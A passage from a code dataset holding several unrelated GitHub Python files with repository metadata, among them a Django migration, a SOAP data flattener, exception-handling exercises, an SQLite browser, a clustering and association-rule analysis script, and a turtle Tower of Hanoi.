requirement[\"eligibleEvidences\"]\n\n if save_tender(self.request, modified=False):\n self.LOGGER.info(\n f\"Deleted requirement eligible evidence {evidence['id']}\",\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_eligible_evidence_delete\"}),\n )\n return {\"data\": self.serializer_class(evidence).data}\n","repo_name":"ProzorroUKR/openprocurement.api","sub_path":"src/openprocurement/tender/core/procedure/views/criterion_rg_requirement_evidence.py","file_name":"criterion_rg_requirement_evidence.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"39739283097","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('music', '0004_auto_20140826_0130'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='video',\n name='preview_url',\n field=models.URLField(blank=True, default='http://placehold.it/480x360&text=[preview]', help_text='A link to the preview image.'),\n preserve_default=False,\n ),\n ]\n","repo_name":"bhrutledge/jahhills.com","sub_path":"hth/music/migrations/0005_video_preview_url.py","file_name":"0005_video_preview_url.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20355207732","text":"import zeep\nfrom pandas import DataFrame\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\ndef flatten(dictionary, parent_key='', sep='_'):\n items = []\n for k, v in dictionary.items():\n new_key = f\"{parent_key}{sep}{k}\" if parent_key else k\n if isinstance(v, dict):\n items.extend(flatten(v, new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\ndef process_batch(batch):\n return 
[flatten(item) for item in batch]\n\ndef batch_process(response, batch_size=1000):\n for i in range(0, len(response), batch_size):\n yield response[i:i + batch_size]\n\n# Replace 'your_soap_service_url' and 'your_soap_method' with your actual SOAP service URL and method\nclient = zeep.Client(wsdl='your_soap_service_url')\nresponse = client.service.your_soap_method()\n\n# Assuming the response is a list of dictionaries\nflattened_data = []\nwith ThreadPoolExecutor() as executor:\n futures = [executor.submit(process_batch, batch) for batch in batch_process(response)]\n for future in as_completed(futures):\n flattened_data.extend(future.result())\n\n# Convert to DataFrame\ndf = DataFrame(flattened_data)\n","repo_name":"ashar19-main/python_data_utilities","sub_path":"soap_api_response_reader_ex.py","file_name":"soap_api_response_reader_ex.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71085469682","text":"'''\nMy solution to Rosalind Bioinformatics Problem 030\n\nTitle: Finding a Spliced Motif\nRosalind ID: SSEQ\nRosalind #: 030\nURL: http://rosalind.info/problems/sseq\n\nGoal - Provided indicies of the nucleotides of a string t in string s.\n'''\n\nfrom Bio import SeqIO\n\nf = open(\"data/rosalind_sseq.txt\", 'r')\nrecords = list(SeqIO.parse(f, \"fasta\"))\nf.close()\n\ns = str(records[0].seq)\nt = str(records[1].seq)\n\nindicies = []\nindex = 0\nfor nt in t:\n s_temp = s[index:]\n # get index of nucleotide, add prior index to keep position\n index = s_temp.index(nt) + 1 + index\n indicies.append(index)\n\no = open(\"output/030_SSEQ.txt\", 'w')\no.write(\" \".join(map(str, indicies)))\no.close()\n \n","repo_name":"cdeterman/Rosalind","sub_path":"030_SSEQ/030_SSEQ.py","file_name":"030_SSEQ.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"75"} +{"seq_id":"36688225923","text":"\ndef err():\n\n a,b = 10,'ab'\n # c = a + b\n # c = a/0\n import csv30\n\ndef release_resource():\n print(\"released resource\")\n\ndef key_err():\n print(\" Program started........\")\n ## Perform some logical operation\n try:\n # l1 = [10,20,30]\n # n = input(\"Enter number:\")\n # n = int(n)\n # c = n/2\n # print(\"l1:\",l1[5])\n print(\"====================gggggggg\")\n return 10\n except KeyboardInterrupt:\n print(\"Exception occured\")\n except ZeroDivisionError:\n print(\"Zero division error occured\")\n except Exception:\n print(\"main Exception occurred\")\n else:\n print(\"No exception occured\")\n finally:\n release_resource()\n\n\n print(\"Program End....\")\n\ndef excep1():\n\n print(\" Program started........\")\n ## Perform some logical operation\n try:\n n = 10/0\n print(\"====================gggggggg\")\n return 10\n except (KeyboardInterrupt,ZeroDivisionError,IndexError):\n print(\"Sending notification send_no_manager\") # send_no_manager\n except Exception:\n print(\"main Exception occurred\")\n else:\n print(\"No exception occured\")\n finally:\n release_resource()\n\n\n print(\"Program End....\")\n\n\nclass CustExcep(Exception):\n\n def __init__(self,msg,val):\n self.msg = msg\n self.val = val\n\n def __str__(self):\n return f\"Exception:{self.msg}:{self.val}\"\n\n\n\ndef account():\n balance = 1000\n withdrawl = float(input(\"Enter amount to withdraw:\"))\n\n if withdrawl > balance:\n raise CustExcep(\"Insufficient Balance:\",balance)\n\n balance = balance - withdrawl\n print(f\"Your balance is:{balance}, 
withdrwal amount:{withdrawl}\")\n\n\ndef main():\n print(\"ATM Sessiuon started\")\n try:\n account()\n\n except CustExcep as e1:\n print(e1)\n else:\n print(\"Your session executed successfully\")\n finally:\n release_resource()\n\n print(\" Thank you for visiting ATM\")\n\n\nif __name__ ==\"__main__\":\n # err()\n # key_err()\n # excep1()\n main()","repo_name":"tauovir/Materials","sub_path":"Python Session/project_demo/source_script/practice/Python_30_may.py","file_name":"Python_30_may.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71509386801","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\n\nn = int(input())\n\n# heap = []\nleft = float(\"inf\")\ncur = None\nanswer = []\n\nfor i in range(n):\n num = int(input())\n if not cur:\n cur = num\n else:\n if cur != num:\n if (left - cur > 0 and num - cur > 0):\n diff = min(left-cur, num-cur)\n elif left - cur > 0:\n diff = left-cur\n elif num - cur > 0: \n diff = num - cur\n else:\n left = cur\n cur = num\n continue\n answer.append(diff)\n left = cur\n cur = num\n else:\n continue\n\n# print(heap)\n# # while len(heap) >= 2:\n# # num, diff = heapq.heappop(heap)\n# # answer += diff\n\n# # print(answer)\nprint(sum(answer))","repo_name":"uiseop/TIL","sub_path":"알고리즘/구현/2374.py","file_name":"2374.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8672543113","text":"#start_index = 0\n#line_length = 10\n\nstart_index, line_length = [int(x) for x in input().split()]\n\n\n\ndef get_num_workers(line_length):\n return (line_length * line_length) - 1\n\nend_index = start_index + get_num_workers(line_length)\n\ni = 0\ncounter = line_length\nskips = 0\n\nprint(f\"Start: {start_index}\")\nprint(f\"Line length: {line_length}\")\nprint(f\"Calc End: {end_index}\")\nprint(\"=====================================\")\n\ntrailing_xor = 0\n\nresult = [list()]\n\nwhile (i + start_index) <= end_index:\n if counter == 0:\n result.append(list())\n print(f\"Skip {skips}\")\n i += skips\n skips += 1\n counter = line_length - skips\n print(f\"Allow {counter} more\")\n continue\n else:\n counter -= 1\n \n trailing_xor = trailing_xor ^ (i + start_index)\n print(i + start_index)\n result[-1].append(i + start_index)\n i += 1\n\nprint(\"=====================================\")\nprint(f\"Result: {trailing_xor}\")\n\nfor x in result:\n for num in x:\n print(str(num).ljust(4, \" \"), end=\"\")\n print()\n","repo_name":"Feez/Algo-Challenges","sub_path":"Foobar/QueueToDo-Debug.py","file_name":"QueueToDo-Debug.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"9806706220","text":"import sqlite3\nfrom os.path import isfile\nfrom TableData import TableData\n\n\nclass SQLite: \n\n def __init__(self, path):\n self.path = path\n\n # Open DB and Initialize connection and cursor \n self.update_db_connection_and_data()\n\n def open_db(self):\n \n # If file not exists\n if not isfile(self.path): \n raise(FileNotFoundError)\n\n connection = sqlite3.connect(self.path)\n return connection, connection.cursor()\n\n def get_tables_list(self): \n request = \"select name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%';\"\n self.cursor.execute(request)\n tables_list = []\n for table in (list(self.cursor.fetchall())):\n tables_list.append(table[0])\n 
return tables_list\n\n def get_data_from_table(self, table_name: str):\n # Compile request\n request = \"SELECT * FROM '\" + table_name + \"'\"\n \n self.cursor.execute(request)\n\n return self.cursor.fetchall()\n\n def get_column_names(self, table_name: str):\n request = \"PRAGMA table_info('\" + table_name + \"');\"\n answer = self.cursor.execute(request).fetchall()\n\n columns_names = list()\n for column_data in answer:\n columns_names.append(column_data[1])\n return columns_names\n \n @staticmethod\n def process_request(request: str):\n request = request.replace(',', ' ')\n return request\n\n def update_db_connection_and_data(self): \n\n self.connection, self.cursor = self.open_db()\n\n self.tables_list = self.get_tables_list()\n\n self.db_data = dict() # dict : {'table_name' : table_data_object}\n\n for table in self.tables_list:\n data = self.get_data_from_table(table)\n columns = self.get_column_names(table)\n \n table_data = TableData(columns, data)\n\n self.db_data[table] = table_data\n \n def execute_request(self, request):\n try:\n self.cursor.execute(request)\n return self.cursor.fetchall()\n except : \n return RuntimeError\n\nif __name__ == \"__main__\":\n path = \"sqlite_example.db\"\n a = SQLite(path)\n","repo_name":"mv-yurchenko/terminal_db_browser","sub_path":"SQLite.py","file_name":"SQLite.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2982256916","text":"import json\nimport argparse\nimport shelve\nfrom importlib import import_module\nfrom core.helper import fatal_error, log_info\nfrom core.downloader import download_timetable\nfrom core.usage_info_builder import find_auditoriums_usage\n\n\nclass Defaults:\n DefaultActionName = 'represent'\n DefaultCachePath = 'timetable'\n\n\ndef execute_action(auditoriums_usage, action_name):\n action_module = import_module(f'.{action_name}', 'actions')\n action_func = getattr(action_module, 'action')\n result = action_func(auditoriums_usage)\n return result\n\n\ndef write_result(obj, result_file):\n try:\n f = open(result_file, 'w', encoding='utf-8')\n f.write(json.dumps(obj, ensure_ascii=False, indent=4))\n except OSError as e:\n fatal_error(\"Can not write results: {}\".format(e.strerror))\n\n\ndef main(args):\n cache_path = args.cache_path if args.cache_path else Defaults.DefaultCachePath\n action_name = args.action if args.action else Defaults.DefaultActionName\n output_path = args.output if args.output else f'{action_name}.json'\n\n if not args.skip_check:\n log_info('Loading timetable')\n download_timetable(cache_path)\n timetable_db = shelve.open(cache_path, writeback=True)\n result = find_auditoriums_usage(timetable_db)\n log_info('Executing action')\n result = execute_action(result, action_name)\n log_info('Writing results')\n write_result(result, output_path)\n\n\nif __name__ == '__main__':\n argument_parser = argparse.ArgumentParser(description=\"BSUIR timetable analysis tool\")\n argument_parser.add_argument('--cache-path', type=str, help='path to the cache of a timetable, default is \"timetable\"')\n argument_parser.add_argument('--output', type=str, help='path to the output file, default is .json')\n argument_parser.add_argument('--skip-check', action='store_true', help='skip loading a timetable, use cache')\n argument_parser.add_argument('--action', type=str, help='script to run against built info, default is \"represent\", '+\n 'the file should be placed under \"actions\" folder and have \"action\" function 
defined with one argument '+\n '(built timetable info will be passed as an argument)')\n\n args = argument_parser.parse_args()\n main(args)","repo_name":"ishimko/bsuir-timetable-analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19223398308","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import silhouette_score\nfrom mlxtend.frequent_patterns import apriori, association_rules\nfrom sklearn.preprocessing import LabelEncoder\nimport preprocessing\nimport pandas as pd\nfrom sklearn.utils import resample\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nimport seaborn as sns\n\nfrom sklearn.utils import resample\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori, association_rules\n# Load data\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\ndf= pd.read_csv('/home/grads/mshutonu/ML_Project/Phase 1/Dataset_final.csv')\nprint(df.head())\n\n\nprint(\"=============Step1: Handling missing values=============\")\nprint(df.isna().sum())\n#print(df.describe().to_csv('describe.csv'))\n\n\nprint(\"=============Step2:Checking and handling duplicate instances==============\")\nduplicated_rows = df[df.duplicated()]\nprint(duplicated_rows.count())\ndf=df.drop_duplicates()\ndf.reset_index(drop=True, inplace=True)\n\n#Encoding string type data\nrem = {\"Male\": 0, \"Female\": 1}\n\ndf['sex']= df['sex'].replace(rem)\nrem2 = {\"N\": 0, \"Y\": 1}\n\ndf['DRK_YN']= df['DRK_YN'].replace(rem2)\n\n\n\n\nprint(\"=============Step3: Anomaly or Outlier Detection===============\")\n\n\ndf_before_outlier= df.shape[0]\n\ncolumns_to_check = [\n \"age\",\n \"height\",\n \"weight\",\n \"waistline\",\n \"sight_left\",\n \"sight_right\",\n \"SBP\",\n \"DBP\",\n \"BLDS\",\n \"tot_chole\",\n \"HDL_chole\",\n \"LDL_chole\",\n \"triglyceride\",\n \"hemoglobin\",\n \"serum_creatinine\",\n \"SGOT_AST\",\n \"SGOT_ALT\",\n \"gamma_GTP\",\n]\n#\nz_scores = (\n df[columns_to_check] - df[columns_to_check].mean()\n) / df[columns_to_check].std()\n\n# 3σ Standart deviation\nthreshold = 3\noutliers = np.abs(z_scores) > threshold\noutlier_columns = outliers.columns[outliers.any()]\ndf_cleaned = df[~outliers.any(axis=1)]\ndf_after_outlier = df_cleaned.shape[0]\n\nprint(\n f\"Due to the removal of outliers the amout of entries reduced from {df_before_outlier} to {df_after_outlier} by {df_before_outlier-df_after_outlier} entries.\"\n)\n\n\nprint(\"=============Step3: Downsampling===============\")\n\n\n\n\n\nminority_class =df['SMK_stat_type_cd'].value_counts().idxmin()\n\n# Separate data by class\nmajority_classes = df[df['SMK_stat_type_cd'] != minority_class]\nminority_class = df[df['SMK_stat_type_cd'] == minority_class]\n\n# Calculate the target count in majority classes\nmajority_class_count = len(majority_classes)\n\n# Downsample each majority class to match the minority class\ndownsampled_majority = pd.DataFrame()\nfor label in majority_classes['SMK_stat_type_cd'].unique():\n majority_class_subset = majority_classes[majority_classes['SMK_stat_type_cd'] == label]\n downsampled_class = resample(majority_class_subset, replace=False, 
n_samples=len(minority_class), random_state=42)\n downsampled_majority = pd.concat([downsampled_majority, downsampled_class])\n\n# Combine classes\nbalanced_data = pd.concat([downsampled_majority, minority_class])\n\n# Shuffle the data\nbalanced_data = balanced_data.sample(frac=1, random_state=42).reset_index(drop=True)\n\n\n\n\n\n\nprint(\"=============Step4:Discretization & Binarization:one hot encoding===================\")\nbalanced_data=pd.get_dummies(balanced_data,columns=['sex', 'hear_left','hear_right', 'urine_protein'],drop_first=True ).astype(int)\nprint(\"Data after OHE:\", balanced_data.head().to_string())\nprint(\"=============Step6:Variable Transformation: Normalization, standardization===================\")\nnum_cols=[ \"age\",\n \"height\",\n \"weight\",\n \"waistline\",\n \"sight_left\",\n \"sight_right\",\n \"SBP\",\n \"DBP\",\n \"BLDS\",\n \"tot_chole\",\n \"HDL_chole\",\n \"LDL_chole\",\n \"triglyceride\",\n \"hemoglobin\",\n \"serum_creatinine\",\n \"SGOT_AST\",\n \"SGOT_ALT\",\n \"gamma_GTP\",]\nbalanced_data_standardized=balanced_data\nfor col in num_cols:\n balanced_data_standardized[col] = (balanced_data_standardized[col]-balanced_data_standardized[col].mean())/balanced_data_standardized[col].std()\nprint(\"Data after Standardization:\", balanced_data_standardized.head().to_string())\n\n\nprint(\"=============Step5:Dimensionality Reduction/Feature Selection===================\")\n\nX = balanced_data_standardized.drop(['DRK_YN','SMK_stat_type_cd' ], axis=1, inplace=False)\ny=balanced_data_standardized[\"SMK_stat_type_cd\"]\n\n\n#random forest feature importance\n\n\n\n\n\nprint(\"------Method 2:Random Forest Feature Importance (threshold 0.01)-------\")\n\nrf = RandomForestClassifier(random_state=42)\nrf.fit(X, y)\n\n\nFeature_importances = rf.feature_importances_\nfeatures = X.columns\nsorted_indices = np.argsort(Feature_importances)\n\n\nthreshold = 0.01\n\nselected_features_rf=[]\neliminated_features_rf=[]\n\nfor feature, importance in zip(features,Feature_importances):\n if importance>threshold:\n selected_features_rf.append(feature)\n else:\n eliminated_features_rf.append(feature)\n\nprint(\"Eliminated Features:\")\nprint(eliminated_features_rf)\nprint(\"\\nFinal Selected Features:\")\nprint(selected_features_rf)\n\nX=X[selected_features_rf]\n\n\n\npca = PCA(n_components=2)\npca.fit(X)\nX_transform = pca.transform(X)\n# Label encoding\nlabel_encoder = LabelEncoder()\ny = label_encoder.fit_transform(y)\n\n\n\nk_values = []\naccuracy_scores = []\n\n# Function to calculate WCSS for a range of k values\ndef calculate_wcss(X, k_range):\n wcss_values = []\n for k in k_range:\n kmeans = KMeans(n_clusters=k, init='k-means++', max_iter=300, n_init=10, random_state=0)\n kmeans.fit(X,y)\n wcss_values.append(kmeans.inertia_)\n return wcss_values\n\n# Range of k values to try\nk_values = range(1, 50) # You can adjust the range as needed\n\n# Calculate WCSS values\nwcss = calculate_wcss(X_transform,k_values)\n\n# Plotting WCSS values for different k values\nplt.plot(k_values, wcss, marker='o', linestyle='-', color='b')\nplt.title('Elbow Method For Optimal k (KMeans)')\nplt.xlabel('Number of Clusters (k)')\nplt.ylabel('Within-Cluster Sum of Squares (WCSS)')\nplt.savefig(\"Elbow_kmeans.jpg\", dpi=300)\nplt.tight_layout()\nplt.show()\n\n# K-means clustering with Silhouette analysis\nsilhouette_scores = []\nk_values = range(2, 10)\n\nfor k in k_values:\n kmeans = KMeans(n_clusters=k, random_state=42)\n kmeans.fit(X_transform)\n labels = kmeans.labels_\n silhouette_avg = 
silhouette_score(X_transform, labels)\n silhouette_scores.append(silhouette_avg)\n\n# Plot Silhouette scores for different k values\nplt.plot(k_values, silhouette_scores, marker='o', linestyle='-', color='b')\nplt.xlabel('Number of Clusters (k)')\nplt.ylabel('Silhouette Score')\nplt.title('Silhouette Analysis for K-means Clustering')\nplt.grid(True, linestyle='--', alpha=0.6)\nplt.savefig(\"silhouette.jpg\", dpi=300)\nplt.show()\n\n# K-means clustering with optimal k\noptimal_k = k_values[np.argmax(silhouette_scores)]\nkmeans = KMeans(n_clusters=optimal_k, random_state=42)\nkmeans_labels = kmeans.fit_predict(X_transform)\n\n# Plotting the clusters with distinct colors\nfor cluster in range(optimal_k):\n cluster_points = X_transform[kmeans_labels == cluster]\n plt.scatter(cluster_points[:, 0], cluster_points[:, 1], label=f'Cluster {cluster + 1}', edgecolor='k')\n\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=300, c='red', marker='X', label='Centroids')\nplt.title(f'K-means Clustering (k={optimal_k})')\nplt.xlabel('Feature 1')\nplt.ylabel('Feature 2')\nplt.legend()\nplt.savefig(\"Kmeans.jpg\", dpi=300)\nplt.show()\n\n# dbscan = DBSCAN(eps=1.5, min_samples=15)\n# #dbscan = DBSCAN(eps=.5, min_samples=20)\n# dbscan_labels = dbscan.fit_predict(X_transform)\n#\n# # Plotting the clusters with distinct colors\n# unique_labels = np.unique(dbscan_labels)\n#\n# for label in unique_labels:\n# if label == -1: # Noise points in DBSCAN\n# noise_points = X_transform[dbscan_labels == label]\n# plt.scatter(noise_points[:, 0], noise_points[:, 1], label='Noise', color='gray', edgecolor='k', alpha=0.3)\n# else:\n# cluster_points = X_transform[dbscan_labels == label]\n# plt.scatter(cluster_points[:, 0], cluster_points[:, 1], label=f'Cluster {label + 1}',edgecolor='k')\n#\n# plt.title('DBSCAN Clustering')\n# plt.xlabel('Feature 1')\n# plt.ylabel('Feature 2')\n# plt.legend()\n# plt.show()\n\n# Apriori algorithm (Association Rule Mining)\n# Create a binary dataset for association rule mining\nimport pandas as pd\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori, association_rules\n\ndf= pd.read_csv('/home/grads/mshutonu/ML_Project/Phase 1/smoking_driking_dataset_Ver01.csv')\nprint(df.head())\ndata=df.sample(n=60000, random_state=42)\n\n#data = data[['SMK_stat_type_cd', 'DRK_YN', 'sex_1', 'hear_left_2.0', 'hear_right_2.0', 'urine_protein_2.0', 'urine_protein_3.0', 'urine_protein_4.0', 'urine_protein_5.0', 'urine_protein_6.0']]\ndata = data[['SMK_stat_type_cd', 'DRK_YN', 'sex', 'hear_left','hear_right', 'urine_protein']]\n\ndata=pd.get_dummies(data )\n# Convert boolean values to 0 and 1\nchange = {False: 0, True: 1}\ndata = data.replace(change)\n\n# Applying Apriori\na = TransactionEncoder()\na_data = a.fit(data).transform(data)\n#a_data=data\ndf = pd.DataFrame(a_data, columns=a.columns_)\n\nprint(\"Processed Data:\")\nprint(data.head())\n\nprint(\"\\nDataFrame after Apriori:\")\nprint(df.head())\n\n# ===============================\n# Applying Apriori and Resulting\n# ==============================\ndf_frequent = apriori(df, min_support=0.0001, use_colnames=True, verbose=1)\nprint(\"\\nDataFrame with Frequent Itemsets:\")\nprint(df_frequent.head().to_string())\n\n# Check if df_frequent is not empty before generating association rules\nif not df_frequent.empty:\n df_ar = association_rules(df_frequent, metric='confidence', min_threshold=0.6)\n df_ar = df_ar.sort_values(['confidence', 'lift'], ascending=[False, False])\n 
print(\"\\nAssociation Rules:\")\n print(df_ar.to_string())\nelse:\n print(\"No frequent itemsets found. Check your data and support threshold.\")\n\n# te = TransactionEncoder()\n# te_ary = te.fit(dataset).transform(dataset)\n# df = pd.DataFrame(te_ary, columns=te.columns_)\n#\n# # Apply Apriori algorithm\n# frequent_itemsets = apriori(df, min_support=0.2, use_colnames=True)\n#\n# # Generate association rules\n# rules = association_rules(frequent_itemsets, metric='confidence', min_threshold=0.5)\n#\n# # Display the results\n# print(\"Frequent Itemsets:\")\n# print(frequent_itemsets)\n#\n# print(\"\\nAssociation Rules:\")\n# print(rules)\n\n\n# # Selecting specific columns\n# df = df[['DRK_YN', 'SMK_stat_type_cd']]\n# df['DRK_YN'] = label_encoder.fit_transform(df['DRK_YN'])\n# df['SMK_stat_type_cd'] = label_encoder.fit_transform(df['SMK_stat_type_cd'])\n# df.replace(2, 1, inplace=True)\n#\n# # Apply Apriori algorithm\n# frequent_itemsets = apriori(df, min_support=0.1, use_colnames=True)\n# rules = association_rules(frequent_itemsets, metric='confidence', min_threshold=0.7)\n#\n# # Display the association rules\n# print('Association Rules:')\n# print(rules.to_string())\n","repo_name":"sm5190/ML_Term_Project","sub_path":"phase4.py","file_name":"phase4.py","file_ext":"py","file_size_in_byte":11158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31466868743","text":"import random\r\nimport turtle\r\nt = turtle\r\nt.shape(\"turtle\")\r\n\r\ndef main():\r\n n = 8 #Disk Control\r\n p1x, p1y = -200, 0 #Peg 1 distance (need to set height to start turtle stack)\r\n p2x = 0 #Peg 2 X (y depends on current turtles stacked)\r\n p3x = 200 #Peg 3 X (y depends on current turtles stacked)\r\n disk = []\r\n color = []\r\n global actions\r\n actions = []\r\n length = 20*n\r\n pegs(p1x,p1y,length,3)\r\n\r\n t.penup()\r\n t.goto(p1x , p1y)\r\n \r\n for i in range(0, n):\r\n t.pendown()\r\n t.st()\r\n \r\n r1 = random.random()\r\n r2 = random.random()\r\n r3 = random.random()\r\n t.fillcolor(r1, r2, r3)\r\n color.append((r1, r2, r3))\r\n \r\n ID = t.stamp()\r\n disk.append(ID)\r\n \r\n t.penup()\r\n t.ht()\r\n t.sety(16 * (i + 1))\r\n\r\n t.goto(-300,0)\r\n for i in range(0,n):\r\n t.pendown()\r\n t.st()\r\n t.fillcolor(color[i])\r\n t.stamp()\r\n t.ht()\r\n t.penup()\r\n t.sety(16 * (i + 1))\r\n \r\n move(p1x,p2x,p3x,n)\r\n f1 = n\r\n t2 = 0\r\n a3 = 0\r\n t.speed(0)\r\n disk.reverse()\r\n color.reverse()\r\n\r\n\r\n for i in range(0,len(actions),3):\r\n for j in range(1,n + 1): #list is reversed, to go to next highest, must subtract\r\n if actions[i] == (j): #IF DISK = 1-10, converter - disk 8 breaks it, dont know why\r\n print(\"Move Disk:\",j)\r\n actions[i] = disk[j - 1]\r\n x = j-1\r\n t.fillcolor(color[j-1])\r\n \r\n \r\n fromPeg = actions[i + 1]\r\n if fromPeg == p1x: #Goto the frompeg to smooth out graphics\r\n #without it, it feels laggy and has random pauses / surges\r\n t.goto(fromPeg, f1*16) \r\n f1 -= 1\r\n elif fromPeg == p2x:\r\n t.goto(fromPeg, t2*16)\r\n t2 -= 1\r\n else:\r\n t.goto(fromPeg, a3*16)\r\n a3 -= 1\r\n \r\n t.clearstamp(actions[i])\r\n \r\n toPeg = actions[i + 2]\r\n if toPeg == p1x:\r\n t.goto(toPeg, f1*16)\r\n f1 += 1\r\n elif toPeg == p2x:\r\n t.goto(toPeg, t2*16)\r\n t2 += 1\r\n elif toPeg == p3x:\r\n t.goto(toPeg, a3*16)\r\n a3 += 1\r\n\r\n t.st()\r\n disk[x] = t.stamp()\r\n t.ht()\r\n \r\n t.done()\r\n \r\ndef pegs(x1,y1,l,n):\r\n if n == 0:\r\n return\r\n else:\r\n t.penup()\r\n t.goto(x1 , y1)\r\n t.pendown()\r\n 
t.setheading(90)\r\n t.forward(l)\r\n t.setheading(0)\r\n pegs(x1 + 200, y1, l, n-1)\r\n\r\ndef move(x,y,z,n):\r\n if n == 1:\r\n actions.append(n)\r\n actions.append(x)\r\n actions.append(y)\r\n else:\r\n move(x,z,y,n-1)\r\n actions.append(n)\r\n actions.append(x)\r\n actions.append(y)\r\n move(z,y,x,n-1)\r\n\r\n\r\nmain()\r\n#p,lg,g,dg,\r\n\r\n \r\n","repo_name":"ZachFingar/pyMath","sub_path":"TOH.py","file_name":"TOH.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29853221212","text":"\"\"\" Distance Metrics\n\n This module implements distance metrics methods between\n 2 vectors\n\"\"\"\n# Python Imports\nimport math\nfrom typing import List, Union\n\n# Third party imports\nimport numpy as np\n\n# PyQt imports\n\n# My imports\nfrom ..Infrastructure.AlgorithmData import AlgorithmData\nfrom ..AI.Chapter2Normalize import NormalizeData, Normalize\nfrom ..Infrastructure.Enums import FieldsTypes, NormalizeRange, NormalizeMethod\n\n\nclass DistanceMetrics(object):\n \"\"\" Distance Metrics \n\n This class implements 3 types of distance metrics between 2 vectors:\n -# Euclidean distance metrics\n -# Manhattan distance metrics\n -# Chebyshave distance metrics\n\n The distance metrics is done between 2 AlgorithmData. at the beginning of the distance\n metrics methods there is a conversion to AlgorithmData\n\n \"\"\"\n\n def euclidean(self, p, q):\n \"\"\" Euclidean distance metrics\n\n The calculation formula is:\n \\f$\\sqrt{\\sum_{i=0}^n (p_i-q_i)^2}\\f$.\n\n \"\"\"\n p = AlgorithmData(p)\n q = AlgorithmData(q)\n\n sum = 0\n for i in range(p.shape[0]):\n sum += math.pow((p[i, 0] - q[i, 0]), 2)\n sum = math.sqrt(sum)\n return sum\n\n def manhattan(self, p: Union[AlgorithmData, List[float]], q: Union[AlgorithmData, List[float]]):\n \"\"\" Manhatten distance metrics\n\n The calculation formula is:\n \\f$\\sum_{i=0}^n |(p_i-q_i|\\f$.\n \"\"\"\n p = AlgorithmData(p)\n q = AlgorithmData(q)\n sum = 0\n for i in range(p.shape[0]):\n sum += abs(p[i, 0] - q[i, 0])\n return sum\n\n def chebyshave(self, p: Union[AlgorithmData, List[float]], q: Union[AlgorithmData, List[float]]):\n \"\"\" Chevichase distance metrics\n\n The calculation formula is:\n \\f$ max|p_i-q_i|\\f$.\n \"\"\"\n\n p = AlgorithmData(p)\n q = AlgorithmData(q)\n sum = 0\n for i in range(p.shape[0]):\n sum = max(sum, abs(p[i, 0] - q[i, 0]))\n return sum\n\n def select(self, prmOptions: List[List[str]], options: List[List[int]], itemToFind: List):\n\n # Create the normalize data matrix\n normalizeDataMatrix = []\n for prmIdx in range(len(prmOptions)):\n normalizeData = NormalizeData(prmIdx, \"Prm\" + str(prmIdx))\n normalizeData[\"fieldName\"] = \"Prm\" + str(prmIdx)\n normalizeData[\"fieldType\"] = FieldsTypes.NominalData\n normalizeData[\"normalizeMethod\"] = NormalizeMethod.EquilateralEncoding\n normalizeData[\"max\"] = len(prmOptions[prmIdx])\n normalizeData[\"min\"] = 0\n normalizeData[\"normalizeRange\"] = NormalizeRange.ZeroToOne\n normalizeData[\"valuesOrder\"] = [value for value in prmOptions[prmIdx]]\n normalizeData[\"indexInDataFile\"] = prmIdx\n normalizeDataMatrix.append(normalizeData)\n\n # In order to use the normalize method we have to simulate like it came from\n # a file which means :\n # 1. each field has a header\n # 2. 
